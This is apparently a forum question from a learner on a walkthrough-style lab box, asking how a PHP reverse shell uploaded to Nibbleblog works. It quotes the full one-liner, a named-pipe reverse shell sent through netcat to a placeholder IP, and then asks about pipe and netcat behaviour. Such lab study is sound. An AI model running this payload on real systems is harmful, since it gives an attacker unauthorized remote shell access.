<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <port> >/tmp/f"); ?>

this is the script, its a php file to upload to a Nibbleblog program from their first like walkthough box. There may be some errors from copy pasting, but its not a matter of correctly entering it I'm trying to understand how it works.

I understand that it tells the system via a php code to on the system remove anything in tmp called f (rm /tmp/f). then make a named pipe in /tmp called f (mkfifo /tmp/f) then cat the contents of the pipe /tmp/f (cat /tmp/f). Now pipe the output of that cat command to an interactive shell that will combine the standard output and standard error output to the same "area"(cat /tmp/f | /bin/sh 0i 2>&1). this area is netcat, which has a connection on the IP and port (removed and replaced with <IP> just to not post random ips online) (|nc <IP> <port>) then netcat writes that input from the shell to /tmp/f and also the attacker.

what I am confused about is why is the new data written to /tmp/f from netcat, not immediately cat back to the shell? for example, if the victim had a file word.txt and the file contained "word". if the attacker wrote "cat word.txt" to the victim, it would be placed in /tmp/f. it would then cat /tmp/f and pipe to the shell. so the shell would receive "cat word.txt" and it would output "word". this output is written to the attacker, and /tmp/f. so now I would assume it would re-cat /tmp/f. so the shell would receive "word". the shell would then give an error message saying: "word isn't a valid command, did you mean: blah blah blah try: blah blah blah". I would assume that error would then get written to netcat and /tmp/f. now re-cat /tmp/f since there is new data that data being the string "word isn't a valid command, did you mean: blah blah blah try: blah blah blah". that gets entered into shell, which then gives a parse error. repeat that whole loop again, and it just keeps adding parse errors, a new line for each string. I assume this because on my shell I would enter a string, copy the whole output, place it back in the shell, and it just grows one "parse error near /n" for every iteration. Clearly this doesn't happen with this script and it works as intended and doesn't fall into this loop, and I don't know why.

Also clearly I need to read more on netcat, but I am not sure why netcat is handling two way conversation (out put from victim shell is going to netcat to attacker, and attacker is writing to netcat which writes to /tmp/f). the way the script is written I would assume netcat is only writing from shell to attacker and /tmp/f, I don't see anywhere that says that attacker can write to netcat to /tmp/f. I'm assuming its because the script says ALL output from netcat goes to /tmp/f, and netcat is capable of handling multiple inputs (from the shell and attacker) but again I definitely need to get a better understanding of that program.

thanks for the help, sorry if this some super basic answer, I already assume its super obvious I just can't seem to grasp it. Chatgpt just keeps saying essentially "its that way because that's the way it is" which...really doesn't seem like a reasonable answer its a computer not magic.